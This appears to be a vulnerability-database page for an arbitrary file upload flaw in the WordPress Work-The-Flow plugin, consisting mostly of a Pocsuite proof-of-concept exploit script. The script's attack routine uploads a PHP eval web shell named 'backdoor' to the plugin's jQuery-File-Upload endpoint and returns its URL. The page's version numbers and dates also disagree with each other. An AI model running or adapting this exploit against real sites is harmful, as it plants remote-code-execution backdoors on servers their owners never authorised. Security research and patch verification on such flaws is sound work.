Wordpress Work-The-Flow Plugin 1.2.1 - Arbitrary File Upload

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Wordpress Work the Flow Plugin 1.2.1 - Arbitrary File Upload vulnerability. Embeds Html5 User File Uploads and Workflows into pages and posts, providing shortcodes to embed front end user file upload capability and/or step by step workflow


                                                #!/usr/bin/env python
# -*- coding: utf-8 -*-

from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register
from pocsuite.lib.utils.password import getWeakPassword
from pocsuite.lib.utils.password import getLargeWeakPassword
import re
import requests


class TestPOC(POCBase):
    
    vulID = '86260'  # ssvid
    version = '1'
    author = '烽火戏诸侯'
    vulDate = '2015-03-15'
    createDate = '2015-11-19'
    updateDate = '2015-11-19'
    references = ['https://www.exploit-db.com/exploits/36640/']
    name = 'Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability'
    appPowerLink = 'www.wordpress.org'
    appName = 'wordpress work the flow'
    appVersion = '2.5.2'
    vulType = 'upload vulnerability'
    desc = '''
Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts. 
Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving.
This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow
    '''
    # the sample sites for examine
    samples = []

    def _verify(self):
        
        result={}
        
        vulurl=self.url+'/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php'
        filename={'Content-Disposition': 'backdoor.php'}
        shell = "<?php echo md5(123)?>"

        resp=req.post(vulurl,headers=filename,data=shell)
        if resp.status_code==200 and 'backdoor' in resp.content:
             result['ShellInfo']={}
             result['ShellInfo']['URL']=vulurl
             result['ShellInfo']['Filename']=filename
             result['ShellInfo']['Content']=shell
         
        return self.parse_attack(result)
        
        
        
    def _attack(self):
        
        result={}
        
        vulurl=self.url+'/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php'
        filename={'Content-Disposition': 'backdoor'}
        shell = "<?php eval($_POST[tyq]);?>"

        resp=req.post(vulurl,headers=filename,data=shell)
        if resp.status_code==200 and 'backdoor' in resp.content:
             result['ShellInfo']={}
             result['ShellInfo']['URL']=vulurl+'file/backdoor.php'
             result['ShellInfo']['Filename']=filename
             result['ShellInfo']['Content']=shell
         
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1